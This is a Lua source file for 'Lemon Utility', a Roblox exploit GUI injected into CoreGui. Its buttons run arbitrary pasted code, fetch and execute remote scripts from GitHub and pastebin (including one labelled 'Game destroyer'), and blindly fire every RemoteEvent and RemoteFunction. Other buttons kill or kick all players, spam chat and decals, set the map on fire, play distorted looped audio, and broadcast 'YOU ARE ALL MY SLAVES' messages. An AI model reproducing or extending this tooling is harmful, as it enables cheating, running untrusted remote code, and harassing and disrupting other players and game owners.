-- Monstrum's Gui to Lua\n-- Version: 3.2

-- Instances:

local vcCFDfsd = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local lemongui = Instance.new("TextLabel")
local x = Instance.new("TextButton")
local admin = Instance.new("TextButton")
local Credits = Instance.new("TextButton")
local exec = Instance.new("TextButton")
local execframe = Instance.new("Frame")
local input = Instance.new("TextBox")
local execute = Instance.new("TextButton")
local Clear = Instance.new("TextButton")
local cred = Instance.new("Frame")
local credi = Instance.new("TextLabel")
local Adminpanel = Instance.new("Frame")
local IY = Instance.new("TextButton")
local call = Instance.new("TextButton")
local fire = Instance.new("TextButton")
local sky = Instance.new("TextButton")
local shutdown = Instance.new("TextButton")
local schmart = Instance.new("TextButton")
local idk = Instance.new("TextButton")
local killall = Instance.new("TextButton")
local hint = Instance.new("TextButton")
local extra = Instance.new("TextButton")
local decal = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")
local Main = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")

--Properties:

vcCFDfsd.Name = "vcCFDfsd"
vcCFDfsd.Parent = game.CoreGui
vcCFDfsd.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = vcCFDfsd
Frame.Active = true
Frame.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Draggable = true
Frame.Position = UDim2.new(0.250441253, -10, 0.261272013, 11)
Frame.Size = UDim2.new(0, 535, 0, 315)

lemongui.Name = "lemon gui"
lemongui.Parent = Frame
lemongui.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
lemongui.BorderColor3 = Color3.fromRGB(0, 0, 0)
lemongui.BorderSizePixel = 0
lemongui.Position = UDim2.new(-7.26717626e-05, 0, 0, 0)
lemongui.Size = UDim2.new(0, 455, 0, 49)
lemongui.Font = Enum.Font.SourceSans
lemongui.Text = "Lemon Utility V1.1"
lemongui.TextColor3 = Color3.fromRGB(255, 255, 255)
lemongui.TextSize = 30.000

x.Name = "x"
x.Parent = Frame
x.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
x.BorderColor3 = Color3.fromRGB(0, 0, 0)
x.BorderSizePixel = 0
x.Position = UDim2.new(0.887233377, 0, 0, 0)
x.Size = UDim2.new(0, 60, 0, 50)
x.Font = Enum.Font.SourceSans
x.Text = "X"
x.TextColor3 = Color3.fromRGB(255, 255, 255)
x.TextSize = 61.000

admin.Name = "admin"
admin.Parent = Frame
admin.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
admin.BorderColor3 = Color3.fromRGB(0, 0, 0)
admin.BorderSizePixel = 0
admin.Position = UDim2.new(0.400000006, 0, 0.149206355, 0)
admin.Size = UDim2.new(0, 117, 0, 30)
admin.Font = Enum.Font.SourceSans
admin.Text = "Admin Panel"
admin.TextColor3 = Color3.fromRGB(255, 255, 255)
admin.TextSize = 14.000

Credits.Name = "Credits"
Credits.Parent = Frame
Credits.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
Credits.BorderColor3 = Color3.fromRGB(0, 0, 0)
Credits.BorderSizePixel = 0
Credits.Position = UDim2.new(0.667289734, 0, 0.149206355, 0)
Credits.Size = UDim2.new(0, 117, 0, 30)
Credits.Font = Enum.Font.SourceSans
Credits.Text = "Credits"
Credits.TextColor3 = Color3.fromRGB(255, 255, 255)
Credits.TextSize = 14.000

exec.Name = "exec"
exec.Parent = Frame
exec.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
exec.BorderColor3 = Color3.fromRGB(0, 0, 0)
exec.BorderSizePixel = 0
exec.Position = UDim2.new(0.0915887877, 0, 0.149206355, 0)
exec.Size = UDim2.new(0, 117, 0, 30)
exec.Font = Enum.Font.SourceSans
exec.Text = "Executer"
exec.TextColor3 = Color3.fromRGB(255, 255, 255)
exec.TextSize = 14.000

execframe.Name = "execframe"
execframe.Parent = Frame
execframe.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
execframe.BorderColor3 = Color3.fromRGB(0, 0, 0)
execframe.BorderSizePixel = 0
execframe.Position = UDim2.new(0, 0, 0.244444445, 0)
execframe.Size = UDim2.new(0, 535, 0, 238)
execframe.Visible = false

input.Name = "input"
input.Parent = execframe
input.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
input.BorderColor3 = Color3.fromRGB(0, 0, 0)
input.BorderSizePixel = 0
input.Position = UDim2.new(0.0242990647, 0, 0.0294117648, 0)
input.Size = UDim2.new(0, 429, 0, 180)
input.ClearTextOnFocus = false
input.Font = Enum.Font.SourceSans
input.MultiLine = true
input.PlaceholderText = "--Made by @thatamazighi"
input.Text = ""
input.TextColor3 = Color3.fromRGB(0, 0, 0)
input.TextSize = 14.000
input.TextXAlignment = Enum.TextXAlignment.Left
input.TextYAlignment = Enum.TextYAlignment.Top

execute.Name = "execute"
execute.Parent = execframe
execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
execute.BorderColor3 = Color3.fromRGB(0, 0, 0)
execute.BorderSizePixel = 0
execute.Position = UDim2.new(0.041121494, 0, 0.831932783, 0)
execute.Size = UDim2.new(0, 91, 0, 28)
execute.Font = Enum.Font.SourceSans
execute.Text = "Execute"
execute.TextColor3 = Color3.fromRGB(0, 0, 0)
execute.TextSize = 14.000

Clear.Name = "Clear"
Clear.Parent = execframe
Clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Clear.BorderColor3 = Color3.fromRGB(0, 0, 0)
Clear.BorderSizePixel = 0
Clear.Position = UDim2.new(0.271028042, 0, 0.831932783, 0)
Clear.Size = UDim2.new(0, 91, 0, 28)
Clear.Font = Enum.Font.SourceSans
Clear.Text = "Clear"
Clear.TextColor3 = Color3.fromRGB(0, 0, 0)
Clear.TextSize = 14.000

cred.Name = "cred"
cred.Parent = Frame
cred.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
cred.BorderColor3 = Color3.fromRGB(0, 0, 0)
cred.BorderSizePixel = 0
cred.Position = UDim2.new(0, 0, 0.244444445, 0)
cred.Size = UDim2.new(0, 535, 0, 238)

credi.Name = "credi"
credi.Parent = cred
credi.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
credi.BorderColor3 = Color3.fromRGB(0, 0, 0)
credi.BorderSizePixel = 0
credi.Position = UDim2.new(-5.70422038e-08, 0, 0, 0)
credi.Size = UDim2.new(0, 532, 0, 238)
credi.Font = Enum.Font.SourceSans
credi.Text = ""
credi.TextColor3 = Color3.fromRGB(255, 255, 255)
credi.TextSize = 23.000
credi.TextYAlignment = Enum.TextYAlignment.Top

Adminpanel.Name = "Adminpanel"
Adminpanel.Parent = Frame
Adminpanel.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
Adminpanel.BorderColor3 = Color3.fromRGB(0, 0, 0)
Adminpanel.BorderSizePixel = 0
Adminpanel.Position = UDim2.new(-7.26717626e-05, 0, 0.244444445, 0)
Adminpanel.Size = UDim2.new(0, 535, 0, 238)

IY.Name = "IY"
IY.Parent = Adminpanel
IY.AnchorPoint = Vector2.new(0, 1)
IY.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
IY.BorderColor3 = Color3.fromRGB(0, 0, 0)
IY.BorderSizePixel = 0
IY.Position = UDim2.new(0.057490211, 0, 0.366679996, 0)
IY.Size = UDim2.new(0, 135, 0, 32)
IY.Font = Enum.Font.SourceSans
IY.Text = "Infinite Yield"
IY.TextColor3 = Color3.fromRGB(0, 0, 0)
IY.TextSize = 14.000

call.Name = "call"
call.Parent = Adminpanel
call.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
call.BorderColor3 = Color3.fromRGB(0, 0, 0)
call.BorderSizePixel = 0
call.Position = UDim2.new(0.0569639392, 0, 0.028469054, 0)
call.Size = UDim2.new(0, 135, 0, 32)
call.Font = Enum.Font.SourceSans
call.Text = "Chat All"
call.TextColor3 = Color3.fromRGB(0, 0, 0)
call.TextSize = 14.000

fire.Name = "fire"
fire.Parent = Adminpanel
fire.AnchorPoint = Vector2.new(0, 1)
fire.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
fire.BorderColor3 = Color3.fromRGB(0, 0, 0)
fire.BorderSizePixel = 0
fire.Position = UDim2.new(0.057490211, 0, 0.564158976, 0)
fire.Size = UDim2.new(0, 135, 0, 32)
fire.Font = Enum.Font.SourceSans
fire.Text = "Fire All!"
fire.TextColor3 = Color3.fromRGB(0, 0, 0)
fire.TextSize = 14.000

sky.Name = "sky"
sky.Parent = Adminpanel
sky.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
sky.BorderColor3 = Color3.fromRGB(0, 0, 0)
sky.BorderSizePixel = 0
sky.Position = UDim2.new(0.664640248, 0, 0.429272681, 0)
sky.Size = UDim2.new(0, 135, 0, 32)
sky.Font = Enum.Font.SourceSans
sky.Text = "Skybox"
sky.TextColor3 = Color3.fromRGB(0, 0, 0)
sky.TextSize = 14.000

shutdown.Name = "shutdown"
shutdown.Parent = Adminpanel
shutdown.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
shutdown.BorderColor3 = Color3.fromRGB(0, 0, 0)
shutdown.BorderSizePixel = 0
shutdown.Position = UDim2.new(0.66650939, 0, 0.0245690867, 0)
shutdown.Size = UDim2.new(0, 135, 0, 32)
shutdown.Font = Enum.Font.SourceSans
shutdown.Text = "Shutdown Server"
shutdown.TextColor3 = Color3.fromRGB(0, 0, 0)
shutdown.TextSize = 14.000

schmart.Name = "schmart"
schmart.Parent = Adminpanel
schmart.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
schmart.BorderColor3 = Color3.fromRGB(0, 0, 0)
schmart.BorderSizePixel = 0
schmart.Position = UDim2.new(0.36590144, 0, 0.662106037, 0)
schmart.Size = UDim2.new(0, 135, 0, 32)
schmart.Font = Enum.Font.SourceSans
schmart.Text = "Fire All Events"
schmart.TextColor3 = Color3.fromRGB(0, 0, 0)
schmart.TextSize = 14.000

idk.Name = "idk"
idk.Parent = Adminpanel
idk.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
idk.BorderColor3 = Color3.fromRGB(0, 0, 0)
idk.BorderSizePixel = 0
idk.Position = UDim2.new(0.365574807, 0, 0.231471211, 0)
idk.Size = UDim2.new(0, 135, 0, 32)
idk.Font = Enum.Font.SourceSans
idk.Text = "Game destroyer"
idk.TextColor3 = Color3.fromRGB(0, 0, 0)
idk.TextSize = 14.000

killall.Name = "kill all"
killall.Parent = Adminpanel
killall.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
killall.BorderColor3 = Color3.fromRGB(0, 0, 0)
killall.BorderSizePixel = 0
killall.Position = UDim2.new(0.666309714, 0, 0.233768314, 0)
killall.Size = UDim2.new(0, 135, 0, 32)
killall.Selected = true
killall.Font = Enum.Font.SourceSans
killall.Text = "Kill All"
killall.TextColor3 = Color3.fromRGB(0, 0, 0)
killall.TextSize = 14.000

hint.Name = "hint"
hint.Parent = Adminpanel
hint.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
hint.BorderColor3 = Color3.fromRGB(0, 0, 0)
hint.BorderSizePixel = 0
hint.Position = UDim2.new(0.36590144, 0, 0.0259113479, 0)
hint.Size = UDim2.new(0, 135, 0, 32)
hint.Font = Enum.Font.SourceSans
hint.Text = "Hint"
hint.TextColor3 = Color3.fromRGB(0, 0, 0)
hint.TextSize = 14.000

extra.Name = "extra"
extra.Parent = Adminpanel
extra.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
extra.BorderColor3 = Color3.fromRGB(0, 0, 0)
extra.BorderSizePixel = 0
extra.Position = UDim2.new(0.365574807, 0, 0.426625222, 0)
extra.Size = UDim2.new(0, 135, 0, 32)
extra.Font = Enum.Font.SourceSans
extra.Text = "Earrape and 666"
extra.TextColor3 = Color3.fromRGB(0, 0, 0)
extra.TextSize = 14.000

decal.Name = "decal"
decal.Parent = Adminpanel
decal.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
decal.BorderColor3 = Color3.fromRGB(0, 0, 0)
decal.BorderSizePixel = 0
decal.Position = UDim2.new(0.057490211, 0, 0.6603387, 0)
decal.Size = UDim2.new(0, 135, 0, 32)
decal.Font = Enum.Font.SourceSans
decal.Text = "Decal Spam"
decal.TextColor3 = Color3.fromRGB(0, 0, 0)
decal.TextSize = 14.000

ImageLabel.Parent = Adminpanel
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0.770172656, 0, 0.61849308, 0)
ImageLabel.Size = UDim2.new(0, 106, 0, 77)
ImageLabel.Image = "rbxassetid://140538653833380"

Main.Name = "Main"
Main.Parent = vcCFDfsd
Main.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Main.BackgroundTransparency = 1.000
Main.BorderColor3 = Color3.fromRGB(27, 42, 53)
Main.Position = UDim2.new(0.0334572494, 0, 0.81524545, 0)
Main.Size = UDim2.new(0, 91, 0, 87)
Main.Image = "http://www.roblox.com/asset/?id=131050543499615"

TextLabel.Parent = Main
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.Position = UDim2.new(1.22999966, 0, -0.0463856161, 0)
TextLabel.Size = UDim2.new(0, 269, 0, 90)
TextLabel.Font = Enum.Font.SourceSansBold
TextLabel.LineHeight = 1.100
TextLabel.Text = ""
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 16.000
TextLabel.TextWrapped = true

-- Scripts:

local function QERYL_script() -- x.LocalScript 
	local script = Instance.new('LocalScript', x)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:Destroy()
	end)
end
coroutine.wrap(QERYL_script)()
local function VTED_script() -- admin.LocalScript 
	local script = Instance.new('LocalScript', admin)

	script.Parent.MouseButton1Click:Connect(function()
		local parent = script.Parent.Parent
		if not parent then return end  
	
		if parent:FindFirstChild("Adminpanel") then
			parent.Adminpanel.Visible = true
		end
	
		if parent:FindFirstChild("execframe") and parent.execframe.Visible then
			parent.execframe.Visible = false
		end
	
		if parent:FindFirstChild("cred") and parent.cred.Visible then
			parent.cred.Visible = false
		end
	end)
	
end
coroutine.wrap(VTED_script)()
local function HFIMFC_script() -- Credits.LocalScript 
	local script = Instance.new('LocalScript', Credits)

	script.Parent.MouseButton1Click:Connect(function()
		local parent = script.Parent.Parent
		if not parent then return end  
	
		if parent:FindFirstChild("cred") then
			parent.cred.Visible = true
		end
	
		if parent:FindFirstChild("Adminpanel") and parent.Adminpanel.Visible then
			parent.Adminpanel.Visible = false
		end
	
		if parent:FindFirstChild("execframe") and parent.execframe.Visible then
			parent.execframe.Visible = false
		end
	end)
	
end
coroutine.wrap(HFIMFC_script)()
local function ACSK_script() -- exec.LocalScript 
	local script = Instance.new('LocalScript', exec)

	script.Parent.MouseButton1Click:Connect(function()
		local parent = script.Parent.Parent
		if not parent then return end  
	
		if parent:FindFirstChild("execframe") then
			parent.execframe.Visible = true
		end
	
		if parent:FindFirstChild("Adminpanel") and parent.Adminpanel.Visible then
			parent.Adminpanel.Visible = false
		end
	
		if parent:FindFirstChild("cred") and parent.cred.Visible then
			parent.cred.Visible = false
		end
	end)
	
end
coroutine.wrap(ACSK_script)()
local function PXWPUD_script() -- execute.LocalScript 
	local script = Instance.new('LocalScript', execute)

	local input = script.Parent.Parent.input
	script.Parent.MouseButton1Click:Connect(function()
		loadstring(input.Text)
	end)
end
coroutine.wrap(PXWPUD_script)()
local function YBSSXY_script() -- Clear.LocalScript 
	local script = Instance.new('LocalScript', Clear)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.input.Text = " "
	end)
end
coroutine.wrap(YBSSXY_script)()
local function PZDS_script() -- IY.LocalScript 
	local script = Instance.new('LocalScript', IY)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
	end)
end
coroutine.wrap(PZDS_script)()
local function HLCS_script() -- call.LocalScript 
	local script = Instance.new('LocalScript', call)

	script.Parent.MouseButton1Click:Connect(function()
		game.TextChatService.BubbleChatConfiguration.MaxBubbles = 150
		game.TextChatService.BubbleChatConfiguration.BubbleDuration = 25
	
		for _, targetPlayer in ipairs(game.Players:GetPlayers()) do
			if targetPlayer and targetPlayer.Character and targetPlayer.Character:FindFirstChild("Head") then
				for i = 1, 1000 do
					game:GetService("Chat"):Chat(targetPlayer.Character.Head, "PRAISE " .. string.upper(game.Players.LocalPlayer.Name), Enum.ChatColor.White)
					wait(0.3)
				end
			end
		end
	end)
	
end
coroutine.wrap(HLCS_script)()
local function TICGUVB_script() -- fire.LocalScript 
	local script = Instance.new('LocalScript', fire)

	script.Parent.MouseButton1Click:Connect(function()
		for i,v in pairs(game.Workspace:GetDescendants()) do
			if v:IsA("Part") or v:IsA("MeshPart") or v:IsA("Model") or v:IsA("Accessory") then
				local a = Instance.new("Fire")
				a.Parent = v
				a.Size = 25
				a.Heat = 100
				a.Name = "Suffer"
			end
		end
	end)
end
coroutine.wrap(TICGUVB_script)()
local function ELQXF_script() -- sky.LocalScript 
	local script = Instance.new('LocalScript', sky)

	local ID = 140538653833380
	script.Parent.MouseButton1Click:Connect(function()
		local skyFound = false
	
	
		for _, v in pairs(game.Lighting:GetChildren()) do
			if v:IsA("Sky") then
	
				v.SkyboxBk = "http://www.roblox.com/asset/?id=" .. ID
				v.SkyboxDn = "http://www.roblox.com/asset/?id=" .. ID
				v.SkyboxFt = "http://www.roblox.com/asset/?id=" .. ID
				v.SkyboxLf = "http://www.roblox.com/asset/?id=" .. ID
				v.SkyboxRt = "http://www.roblox.com/asset/?id=" .. ID
				v.SkyboxUp = "http://www.roblox.com/asset/?id=" .. ID
				skyFound = true
				break
			end
		end
	
	
		if not skyFound then
			local a = Instance.new("Sky")
			a.Parent = game.Lighting
			a.SkyboxBk = "http://www.roblox.com/asset/?id=" .. ID
			a.SkyboxDn = "http://www.roblox.com/asset/?id=" .. ID
			a.SkyboxFt = "http://www.roblox.com/asset/?id=" .. ID
			a.SkyboxLf = "http://www.roblox.com/asset/?id=" .. ID
			a.SkyboxRt = "http://www.roblox.com/asset/?id=" .. ID
			a.SkyboxUp = "http://www.roblox.com/asset/?id=" .. ID
		end
	end)
	
end
coroutine.wrap(ELQXF_script)()
local function MWTUSES_script() -- shutdown.LocalScript 
	local script = Instance.new('LocalScript', shutdown)

	local function kickAllPlayers()
		for _, player in pairs(game.Players:GetPlayers()) do
			player:Kick("Server Shutdown")
		end
	end
	
	script.Parent.MouseButton1Click:Connect(function()
		kickAllPlayers()
	end)
	
end
coroutine.wrap(MWTUSES_script)()
local function ZQXHWZT_script() -- schmart.LocalScript 
	local script = Instance.new('LocalScript', schmart)

	script.Parent.MouseButton1Click:Connect(function()
		for _, v in pairs(game.ReplicatedStorage:GetDescendants()) do
			if v:IsA("RemoteEvent") then
				pcall(function() 
					print("Fired RemoteEvent:", v:GetFullName())
					v:FireServer()
				end)
			elseif v:IsA("RemoteFunction") then
				pcall(function()  
					print("Fired RemoteFunction:", v:GetFullName())  
					v:InvokeServer() 
				end)
			elseif v:IsA("BindableEvent") then
				pcall(function()  
					print("Fired BindableEvent:", v:GetFullName())  
					v:Fire() 
				end)
			elseif v:IsA("BindableFunction") then
				pcall(function()  
					print("Fired BindableFunction:", v:GetFullName())  
					v:Invoke() 
				end)
			end
		end
	end)
	
end
coroutine.wrap(ZQXHWZT_script)()
local function EHKPH_script() -- idk.LocalScript 
	local script = Instance.new('LocalScript', idk)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://pastebin.com/raw/m2zMyH1V",true))()
	end)
end
coroutine.wrap(EHKPH_script)()
local function MAYIYJF_script() -- killall.LocalScript 
	local script = Instance.new('LocalScript', killall)

	script.Parent.MouseButton1Click:Connect(function()
		for _, player in pairs(game.Players:GetPlayers()) do
			if player.Character and player.Character:FindFirstChild("Humanoid") then
				player.Character.Humanoid.Health = 0
			end
		end
	end)
	
end
coroutine.wrap(MAYIYJF_script)()
local function UKURH_script() -- hint.LocalScript 
	local script = Instance.new('LocalScript', hint)

	script.Parent.MouseButton1Click:Connect(function()
		local p = game.Players.LocalPlayer.Name
		local a = Instance.new("Hint")
		local b = Instance.new("Message")
		b.Parent = game.Workspace
		b.Text = "YOU ARE ALL MY SLAVES NOW!!! PRAISE " .. string.upper(p)
		a.Parent = game.Workspace
		a.Text = "CRY AND SUFFER FOR YOU ARE ALL MY SLAVES"
		wait(10)
		b:Destroy()
	end)
	
end
coroutine.wrap(UKURH_script)()
local function JNSWUM_script() -- extra.LocalScript 
	local script = Instance.new('LocalScript', extra)

	--Made by @Bannerv3 on Discord
	--If you somehow got the source of Lemon Gui meh i dont care xD have fun looking at my shitty scripts i guess
	local ID = 4701145966
	
	local decalspam = function()
		for i, v in pairs(game.Workspace:GetChildren()) do
			if v:IsA("Part") or v:IsA("Model") or v:IsA("MeshPart") then
				local decal1 = Instance.new("Decal")
				local decal2 = Instance.new("Decal")
				local decal3 = Instance.new("Decal")
				local decal4 = Instance.new("Decal")
				local decal5 = Instance.new("Decal")
				local decal6 = Instance.new("Decal")
				decal1.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal2.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal3.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal4.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal5.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal6.Texture = "http://www.roblox.com/asset/?id=" .. ID
				decal1.Parent = v
				decal2.Parent = v
				decal3.Parent = v
				decal4.Parent = v
				decal5.Parent = v
				decal6.Parent = v
				decal1.Face = "Front"
				decal2.Face = "Top"
				decal3.Face = "Left"
				decal4.Face = "Right"
				decal5.Face = "Bottom"
				decal6.Face = "Back"
	
				for i, v in pairs(game.Workspace:GetChildren()) do
					if v:IsA("Model") or v:IsA("Part") or v:IsA("MeshPart") then
						for i, z in pairs(v:GetChildren()) do
							if z:IsA("Part") then
								local decal7 = Instance.new("Decal")
								local decal8 = Instance.new("Decal")
								local decal9 = Instance.new("Decal")
								local decal10 = Instance.new("Decal")
								local decal11 = Instance.new("Decal")
								local decal12 = Instance.new("Decal")
								decal7.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal8.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal9.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal10.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal11.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal12.Texture = "http://www.roblox.com/asset/?id=" .. ID
								decal7.Parent = z
								decal8.Parent = z
								decal9.Parent = z
								decal10.Parent = z
								decal11.Parent = z
								decal12.Parent = z
								decal7.Face = "Front"
								decal8.Face = "Top"
								decal9.Face = "Left"
								decal10.Face = "Right"
								decal11.Face = "Bottom"
								decal12.Face = "Back"
							end
						end
					end
				end
			end
		end
	end
	
	local sounds = function()
		for _, v in pairs(game.Workspace:GetDescendants()) do
			if v:IsA("Sound") then
				v.SoundId = "rbxassetid://5348162330"
				v.PlaybackSpeed = 0.229
				v.Looped = true
				v.RollOffMaxDistance = 1000000
				v:Play()
				v.Volume = 10
			end
		end
		for _, z in pairs(game.Workspace:GetChildren()) do
			if z:IsA("Part") or z:IsA("MeshPart") or z:IsA("Model") then
				local sound = Instance.new("Sound")
				sound.SoundId = "rbxassetid://5348162330"
				sound.PlaybackSpeed = 0.229
				sound.Looped = true
				sound.Parent = z
				sound.Volume = 10
				sound.RollOffMaxDistance = 1000000
				sound:Play()
				local s2 = Instance.new("Sound")
				s2.SoundId = "rbxassetid://5348162330"
				s2.PlaybackSpeed = 0.229
				s2.Looped = true
				s2.RollOffMaxDistance = 1000000
				s2.Parent = z
				s2.Volume = 10
				s2:Play()
			end
		end
	end
	
	local c = function()
		
		for i, v in pairs(game.Lighting:GetChildren()) do
			if v:IsA("Sky") then
				v:Destroy()
			end
		end
	
		
		local sky = Instance.new("Sky")
		sky.Parent = game.Lighting
		sky.SkyboxBk = "http://www.roblox.com/asset/?id=" .. ID
		sky.SkyboxDn = "http://www.roblox.com/asset/?id=" .. ID
		sky.SkyboxFt = "http://www.roblox.com/asset/?id=" .. ID
		sky.SkyboxLf = "http://www.roblox.com/asset/?id=" .. ID
		sky.SkyboxRt = "http://www.roblox.com/asset/?id=" .. ID
		sky.SkyboxUp = "http://www.roblox.com/asset/?id=" .. ID
	end
	
	local particle = function()
		for i,v in pairs(game.Workspace:GetDescendants()) do
			if v:IsA("ParticleEmitter") then
				v.Rate = 10
				v.Speed = 5
				v.Texture = "rbxassetid://" .. ID
				v.Lifetime = 10
				v.Enabled = true
				if not v then
					for i,f in pairs(game.Workspace:GetChildren()) do
						if f:IsA("Part") or f:IsA("Model") or f:IsA("MeshPart") then
							local b = Instance.new("ParticleEmitter")
							local a = Instance.new("ParticleEmitter")
							a.Parent = f
							a.Speed = 5
							a.Texture = "rbxassetid://" .. ID
							a.Lifetime = 10
							a.Enabled = true
							b.Parent = f
							b.Speed = 5
							b.Texture = "rbxassetid://" .. ID
							b.Lifetime = 10
							b.Enabled = true
						end
					end
				end
			end
		end
	end
	local demon = function()
		for i,v in pairs(game.Workspace:GetChildren()) do
			if v:IsA("Part") or v:IsA("Model") or v:IsA("MeshPart") then
				for i,f in pairs(v:GetChildren()) do
					if v:IsA("Part") or v:IsA("Model") or v:IsA("MeshPart") then
						local a = Instance.new("Fire")
						a.Parent = v
						a.Size = 15
						a.Heat = 100
					end
				end
			end
		end
	end
	
	script.Parent.MouseButton1Click:Connect(function()
		decalspam()
		sounds()
		c()
		particle()
		demon()
	end)
	
end
coroutine.wrap(JNSWUM_script)()
local function KRVCFD_script() -- decal.LocalScript 
	local script = Instance.new('LocalScript', decal)

	--Made by @Bannerv3 xD
	--Just an boring project xD
	local decal = function()
	
	
	
		script.Parent.MouseButton1Click:Connect(function()
			local ID = 140538653833380
	
			for i,v in pairs(game.Workspace:GetDescendants()) do
				if v:IsA("Part") or v:IsA("Model") then
					local decal1 = Instance.new("Decal")
					local decal2 = Instance.new("Decal")
					local decal3 = Instance.new("Decal")
					local decal4 = Instance.new("Decal")
					local decal5 = Instance.new("Decal")
					local decal6 = Instance.new("Decal")
					decal1.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal2.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal3.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal4.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal5.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal6.Texture = "http://www.roblox.com/asset/?id=" .. ID
					decal1.Parent = v
					decal2.Parent = v
					decal3.Parent = v
					decal4.Parent = v
					decal5.Parent = v
					decal6.Parent = v
					decal1.Face = "Front"
					decal2.Face = "Top"
					decal3.Face = "Left"
					decal4.Face = "Right"
					decal5.Face = "Bottom"
					decal6.Face = "Back"
	
					for i,v in pairs(v:GetChildren()) do
						if v:IsA("Part") or v:IsA("Model") then
							local decal1 = Instance.new("Decal")
							local decal2 = Instance.new("Decal")
							local decal3 = Instance.new("Decal")
							local decal4 = Instance.new("Decal")
							local decal5 = Instance.new("Decal")
							local decal6 = Instance.new("Decal")
							decal1.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal2.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal3.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal4.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal5.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal6.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal1.Parent = v
							decal2.Parent = v
							decal3.Parent = v
							decal4.Parent = v
							decal5.Parent = v
							decal6.Parent = v
							decal1.Face = "Front"
							decal2.Face = "Top"
							decal3.Face = "Left"
							decal4.Face = "Right"
							decal5.Face = "Bottom"
							decal6.Face = "Back"
						end
					end
				end
			end
	
			for i,v in pairs(game.Workspace:GetDescendants()) do
				if v:IsA("Model") then
					for i,z in pairs(v:GetChildren()) do
						if z:IsA("Part") then
							local decal7 = Instance.new("Decal")
							local decal8 = Instance.new("Decal")
							local decal9 = Instance.new("Decal")
							local decal10 = Instance.new("Decal")
							local decal11 = Instance.new("Decal")
							local decal12 = Instance.new("Decal")
							decal7.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal8.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal9.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal10.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal11.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal12.Texture = "http://www.roblox.com/asset/?id=" .. ID
							decal7.Parent = z
							decal8.Parent = z
							decal9.Parent = z
							decal10.Parent = z
							decal11.Parent = z
							decal12.Parent = z
							decal7.Face = "Front"
							decal8.Face = "Top"
							decal9.Face = "Left"
							decal10.Face = "Right"
							decal11.Face = "Bottom"
							decal12.Face = "Back"
						end
					end
				end
			end
		end)
	
	end
	
	script.Parent.MouseButton1Click:Connect(function()
		while true do
			decal()
			wait(20)
		end
	end)
end
coroutine.wrap(KRVCFD_script)()
local function BVTHY_script() -- vcCFDfsd.welcome 
	local script = Instance.new('LocalScript', vcCFDfsd)

	local player = game.Players.LocalPlayer
	if script.Parent then
		game.StarterGui:SetCore("SendNotification", {
			Title = "Welcome "..player.Name,
			Text = "Lemon Utility made by @thatamazighi!",
			Duration = 3
		})
	end
	script.Parent.Frame.cred.credi.Text = [[Made by @thatamazighi
	Thank you for using Lemon Utility!
	If any bugs are found, contact @thatoneamazighi on Discord :D]]
end
coroutine.wrap(BVTHY_script)()
